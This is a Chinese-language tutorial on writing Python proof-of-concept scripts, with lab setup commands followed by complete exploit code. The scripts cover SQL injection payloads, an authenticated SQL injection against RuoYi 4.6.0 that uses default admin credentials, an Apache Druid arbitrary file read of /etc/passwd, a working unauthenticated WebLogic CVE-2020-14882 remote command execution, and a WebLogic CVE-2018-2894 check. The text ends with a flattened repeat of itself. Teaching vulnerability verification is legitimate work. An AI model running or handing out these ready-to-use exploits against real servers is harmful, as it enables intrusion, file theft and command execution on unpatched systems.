Python Poc编写实例:从原理到实践
字数 1172 2025-08-24 07:48:33

Python PoC编写实例:从原理到实践

一、PoC基础概念

PoC (Proof of Concept, 概念验证) 是为了验证某个潜在的漏洞或安全问题而编写的脚本。主要目的是:

  • 验证漏洞是否存在
  • 提供漏洞存在的证据
  • 为后续开发完整利用工具(EXP)奠定基础

二、SQL注入PoC编写

1. 环境搭建

使用Docker搭建sqli-lab漏洞环境:

docker search sqli-lab
docker pull acgpiano/sqli-labs
docker run -dt --name sqli -p 80:80 --rm acgpiano/sqli-labs

2. GET型单引号报错注入(Less-1)

Payload示例

' AND (updatexml(1,concat(0x7e,(SELECT version()),0x7e),1)) AND 'utgs'='utgs

Python PoC代码

import requests

url = "http://192.168.148.155/Less-1/?id=1"
headers = {
    'User-Agent': "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/112.0.0.0 Safari/537.36"
}
payload = "' AND (updatexml(1,concat(0x7e,(SELECT version()),0x7e),1)) AND 'utgs'='utgs"

res = requests.get(url + payload, headers=headers, timeout=5)
if "XPATH syntax error: '~5.5.44-0ubuntu0.14.04.1~'" in res.text:
    print('[+]Vulnerable to SQL injection: ' + url)
else:
    print('[-] Not Vulnerable: ' + url)

3. POST型单引号报错注入(Less-11)

Python PoC代码

import requests

url = "http://192.168.148.155/Less-12/"
headers = {
    'User-Agent': "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/112.0.0.0 Safari/537.36"
}
payload = {
    "uname": "' AND (updatexml(1,concat(0x7e,(SELECT version()),0x7e),1)) AND 'utgs'='utgs",
    "passwd": "123456",
    "submit": "Submit"
}

res = requests.post(url, headers=headers, data=payload, timeout=5)
if "XPATH syntax error: '~5.5.44-0ubuntu0.14.04.1~'" in res.text:
    print('[+] Vulnerable to SQL injection: ' + url)
else:
    print('[-] Not Vulnerable: ' + url)

4. POST型单引号延时注入(Less-15)

Payload示例

1' AND (SELECT 2707 FROM (SELECT(SLEEP(5)))vWgP) AND 'xDGW'='xDGW

Python PoC代码

import requests
import time

url = "http://192.168.148.155/Less-15/"
headers = {
    'User-Agent': "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/112.0.0.0 Safari/537.36"
}
payload = {
    "uname": "1' AND (SELECT 2707 FROM (SELECT(SLEEP(5)))vWgP) AND 'xDGW'='xDGW",
    "passwd": "123456",
    "submit": "Submit"
}

start_time = time.time()
res = requests.post(url, headers=headers, data=payload, timeout=10)
end_time = time.time()

if end_time - start_time > 5:
    print('[+] Vulnerable to SQL injection')
else:
    print('[-] Not vulnerable to SQL injection')

5. 若依v4.6.0后台SQL注入

完整PoC代码

import requests
import argparse

def argument():
    parser = argparse.ArgumentParser(description="python3 demo.py -u [login_url] -c [cookie] -v [Verification_Code] -b [Vul Links]")
    parser.add_argument('-u', '--url', type=str, metavar='', required=True, help='Please input the vulnerable url')
    parser.add_argument('-c', '--cookie', type=str, metavar='', required=True, help='Please input the vul target cookie')
    parser.add_argument('-v', '--validateCode', type=int, metavar='', required=True, help='Please inpute the verification code')
    parser.add_argument('-b', '--bgurl', type=str, metavar='', required=True, help='Please inpute the Login background vulnerable url')
    return parser.parse_args()

def banner():
    print("""
     __
    |  |
    |  | |_ __
    |  | |_ v 4.6.0
    """)

def Poc(url, cookie, validateCode, bgurl):
    headers = {
        'User-Agent': 'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/112.0.0.0 Safari/537.36',
        'Cookie': cookie
    }
    data = {
        'username': 'admin',
        'password': 'admin123',
        'validateCode': validateCode,
        'rememberMe': 'false'
    }

    res = requests.post(url, headers=headers, data=data, timeout=5)
    if "操作成功" in res.text:
        post_url = bgurl
        post_data = {
            'pageSize': '10',
            'pageNum': '1',
            'orderByColumn': 'roleSort',
            'isAsc': 'asc',
            'roleName': '',
            'roleKey': '',
            'status': '',
            'params%5BbeginTime%5D': '',
            'params%5BendTime%5D': '',
            'params[dataScope]': 'and+updatexml(1,concat(0x7e,(SELECT+version()),0x7e),1)%2523'
        }
        post_headers = headers
        post_requests = requests.post(url=post_url, data=post_data, headers=post_headers)
        
        if "java.sql.SQLException: XPATH syntax error:" in post_requests.text:
            print("[+] Vulnerable to SQL injection")
        else:
            print("[-] Not vulnerable to SQL injection")
    elif "验证码错误":
        print("[-] Error Occurred, Please Check you input")

if __name__ == '__main__':
    banner()
    args = argument()
    Poc(args.url, args.cookie, args.validateCode, args.bgurl)

三、任意文件读取PoC编写

Apache Druid LoadData任意文件读取(CVE-2021-36749)

环境搭建

# 进入CVE-2021-25646目录
docker-compose up -d

影响版本:Apache Druid Version < 0.22

PoC代码

import requests
import argparse

def argument():
    parser = argparse.ArgumentParser(description="usage:python3 demo.py -u [url]")
    parser.add_argument('-u', '--url', type=str, metavar='', required=True, help='Please input the vulnerable url')
    return parser.parse_args()

def banner():
    print("""
     __
    /  |
    |  |
    |  \_
    """)

def Poc(url):
    lists = ["file:///etc/passwd", "file:///C:/Windows/win.ini"]
    headers = {
        'User-Agent': 'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko)'
    }
    try:
        for list in lists:
            post_data = {
                "type": "index",
                "spec": {
                    "type": "index",
                    "ioConfig": {
                        "type": "index",
                        "inputSource": {
                            "type": "http",
                            "uris": [list]
                        },
                        "inputFormat": {
                            "type": "regex",
                            "pattern": "(.*)",
                            "columns": ["raw"]
                        }
                    },
                    "dataSchema": {
                        "dataSource": "sample",
                        "timestampSpec": {
                            "column": "!!!_no_such_column_!!!",
                            "missingValue": "1970-01-01T00:00:00Z"
                        },
                        "dimensionsSpec": {}
                    },
                    "tuningConfig": {
                        "type": "index"
                    }
                },
                "samplerConfig": {
                    "numRows": 500,
                    "timeoutMs": 15000
                }
            }
            res = requests.post(url, json=post_data, headers=headers, verify=False, allow_redirects=False)
            if "root:x" in res.text or "[fonts]" in res.text:
                print("[+] 存在 Apache Druid LoadData 任意文件读取漏洞")
                break
            else:
                print("[-] 不存在 Apache Druid LoadData 任意文件读取漏洞")
                break
    except Exception as e:
        print("[-] 请检查输入是否有误")

if __name__ == '__main__':
    banner()
    args = argument()
    Poc(args.url)

四、远程命令执行(RCE)PoC编写

Weblogic CVE-2020-14882未授权远程命令执行

环境搭建

# 进入CVE-2020-14882目录
docker-compose up -d

影响版本

  • WebLogic Server 10.3.6.0.0
  • WebLogic Server 12.1.3.0.0
  • WebLogic Server 12.2.1.3.0
  • WebLogic Server 12.2.1.4.0
  • WebLogic Server 14.1.1.0.0

PoC代码

import requests
import argparse
import http.client

http.client.HTTPConnection._http_vsn_str = 'HTTP/1.0'

def argument():
    parser = argparse.ArgumentParser(description="usage:python3 demo.py -u [url] -c [command]")
    parser.add_argument('-u', '--url', type=str, metavar='', required=True, help='[*] Please assign vulnerable url')
    parser.add_argument('-c', '--cmd', type=str, metavar='', required=True, help='[*] Please assign command')
    return parser.parse_args()

def banner():
    print("""
     __
    /  |
    |  |
    |  \_
    """)

def Poc():
    args = argument()
    url = args.url
    cmd = args.cmd
    path = "/console/images/%252E%252E%252Fconsole.portal"
    headers = {
        'User-Agent': 'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/112.0.0.0 Safari/537.36',
        'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7',
        'Accept-Encoding': 'gzip, deflate',
        'Accept-Language': 'en-GB,en-US;q=0.9,en;q=0.8',
        'Content-Type': 'application/x-www-form-urlencoded',
        'cmd': cmd
    }
    payload = '''_nfpb=true&_pageLabel=HomePage1&handle=com.tangosol.coherence.mvel2.sh.ShellSession('weblogic.work.ExecuteThread executeThread = (weblogic.work.ExecuteThread) Thread.currentThread();weblogic.work.WorkAdapter adapter = executeThread.getCurrentWork();java.lang.reflect.Field field = adapter.getClass().getDeclaredField("connectionHandler");field.setAccessible(true);Object obj = field.get(adapter);weblogic.servlet.internal.ServletRequestImpl req = (weblogic.servlet.internal.ServletRequestImpl) obj.getClass().getMethod("getServletRequest").invoke(obj);String cmd = req.getHeader("cmd");String[] cmds = System.getProperty("os.name").toLowerCase().contains("window") ? new String[]{"cmd.exe", "/c", cmd} : new String[]{"/bin/sh", "-c", cmd};if (cmd != null) {String result = new java.util.Scanner(java.lang.Runtime.getRuntime().exec(cmds).getInputStream()).useDelimiter("\\A").next();weblogic.servlet.internal.ServletResponseImpl res = (weblogic.servlet.internal.ServletResponseImpl) req.getClass().getMethod("getResponse").invoke(req);res.getServletOutputStream().writeStream(new weblogic.xml.util.StringInputStream(result));res.getServletOutputStream().flush();res.getWriter().write("");}executeThread.interrupt();'''
    try:
        res = requests.post(url=url+path, data=payload, headers=headers, verify=False, allow_redirects=False, timeout=10)
        print("[+] Command results are as follows: ")
        print(res.text)
    except Exception as e:
        print("[-] Please Check your url and cmd!")

if __name__ == '__main__':
    banner()
    Poc()

五、任意文件上传PoC编写

Weblogic任意文件上传(CVE-2018-2894)

环境搭建

# 进入weblogic CVE-2018-2894目录
docker-compose up -d

影响版本

  • WebLogic Server 10.3.6.0.0
  • WebLogic Server 12.1.3.0.0
  • WebLogic Server 12.2.1.2.0
  • WebLogic Server 12.2.1.3.0

PoC代码

import requests
import argparse

def argument():
    parser = argparse.ArgumentParser(description="usage:python3 demo.py -u [url]")
    parser.add_argument('-u', '--url', type=str, metavar='', required=True, help='Please input the vulnerable url')
    return parser.parse_args()

def banner():
    print("""
     __
    /  |
    |  |
    |  \_
    """)

def Poc():
    args = argument()
    url = args.url
    headers = {
        'User-Agent': 'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/112.0.0.0 Safari/537.36'
    }
    try:
        res = requests.get(url + "/ws_utc/resources/setting/options/general", headers=headers, timeout=5, verify=False, allow_redirects=False)
        if "<name>BasicConfigOptions.workDir</name>" in res.text:
            print("[+] 存在 CVE-2018-2894 WebLogic任意文件上传漏洞")
        else:
            print("[-] 不存在 CVE-2018-2894 WebLogic 任意文件上传漏洞")
    except Exception as e:
        print("[-] 请检查输入是否有误!")

if __name__ == '__main__':
    banner()
    Poc()

六、Python库使用技巧

1. argparse库

用于参数化输入:

import argparse

parser = argparse.ArgumentParser(description="usage:python3 demo.py -u [url]")
parser.add_argument('-u', '--url', type=str, metavar='', required=True, help='Please input the vulnerable url')
args = parser.parse_args()

2. sys库

另一种参数化输入方式:

import sys

if len(sys.argv) != 3:
    print("使用方法: python myapp.py <参数1> <参数2>")
    sys.exit(1)

url = sys.argv[1]
command = sys.argv[2]

3. json库

处理JSON数据:

import json

# 解析JSON字符串
json_str = '{"name": "John", "age": 30, "city": "New York"}'
data = json.loads(json_str)
print(data["name"])

# 生成JSON字符串
data = {"name": "John", "age": 30, "city": "New York"}
json_str = json.dumps(data)
print(json_str)

# 从文件读取JSON
with open("data.json") as json_file:
    data = json.load(json_file)
    print(data["name"])

# 写入JSON到文件
with open("data.json", "w") as json_file:
    json.dump(data, json_file)

4. time库

时间相关操作:

import time

# 获取当前时间戳
timestamp = time.time()

# 时间戳转可读时间
readable_time = time.ctime(timestamp)

# 延迟执行
time.sleep(2)

# 记录代码执行时间
start_time = time.time()
# 执行代码
end_time = time.time()
execution_time = end_time - start_time

5. open函数

文件操作:

# 读取文件
with open('file.txt', 'r') as file:
    content = file.read()

# 逐行读取
with open('file.txt', 'r') as file:
    for line in file:
        print(line)

# 写入文件
with open('file.txt', 'w') as file:
    file.write('Hello, World!\n')

# 追加内容
with open('file.txt', 'a') as file:
    file.write('This is an additional line.\n')

七、PoC编写总结

  1. 基本流程

    • 分析漏洞触发点
    • 确定验证方式(特征码、延时、报错等)
    • 编写请求代码
    • 处理响应判断漏洞存在性
  2. 关键点

    • 请求头设置(User-Agent、Cookie等)
    • 请求方法选择(GET/POST)
    • 参数编码处理
    • 响应特征匹配
  3. 进阶技巧

    • 使用模块化设计(函数封装)
    • 添加参数化输入
    • 异常处理
    • 多Payload遍历测试
  4. 注意事项

    • 遵守法律法规
    • 仅用于授权测试
    • 添加适当的延迟避免对目标造成过大压力
    • 清晰的输出和错误提示
Python PoC编写实例:从原理到实践 一、PoC基础概念 PoC (Proof of Concept, 概念验证) 是为了验证某个潜在的漏洞或安全问题而编写的脚本。主要目的是: 验证漏洞是否存在 提供漏洞存在的证据 为后续开发完整利用工具(EXP)奠定基础 二、SQL注入PoC编写 1. 环境搭建 使用Docker搭建sqli-lab漏洞环境: 2. GET型单引号报错注入(Less-1) Payload示例 : Python PoC代码 : 3. POST型单引号报错注入(Less-11) Python PoC代码 : 4. POST型单引号延时注入(Less-15) Payload示例 : Python PoC代码 : 5. 若依v4.6.0后台SQL注入 完整PoC代码 : 三、任意文件读取PoC编写 Apache Druid LoadData任意文件读取(CVE-2021-36749) 环境搭建 : 影响版本 :Apache Druid Version < 0.22 PoC代码 : 四、远程命令执行(RCE)PoC编写 Weblogic CVE-2020-14882未授权远程命令执行 环境搭建 : 影响版本 : WebLogic Server 10.3.6.0.0 WebLogic Server 12.1.3.0.0 WebLogic Server 12.2.1.3.0 WebLogic Server 12.2.1.4.0 WebLogic Server 14.1.1.0.0 PoC代码 : 五、任意文件上传PoC编写 Weblogic任意文件上传(CVE-2018-2894) 环境搭建 : 影响版本 : WebLogic Server 10.3.6.0.0 WebLogic Server 12.1.3.0.0 WebLogic Server 12.2.1.2.0 WebLogic Server 12.2.1.3.0 PoC代码 : 六、Python库使用技巧 1. argparse库 用于参数化输入: 2. sys库 另一种参数化输入方式: 3. json库 处理JSON数据: 4. time库 时间相关操作: 5. open函数 文件操作: 七、PoC编写总结 基本流程 : 分析漏洞触发点 确定验证方式(特征码、延时、报错等) 编写请求代码 处理响应判断漏洞存在性 关键点 : 请求头设置(User-Agent、Cookie等) 请求方法选择(GET/POST) 参数编码处理 响应特征匹配 进阶技巧 : 使用模块化设计(函数封装) 添加参数化输入 异常处理 多Payload遍历测试 注意事项 : 遵守法律法规 仅用于授权测试 添加适当的延迟避免对目标造成过大压力 清晰的输出和错误提示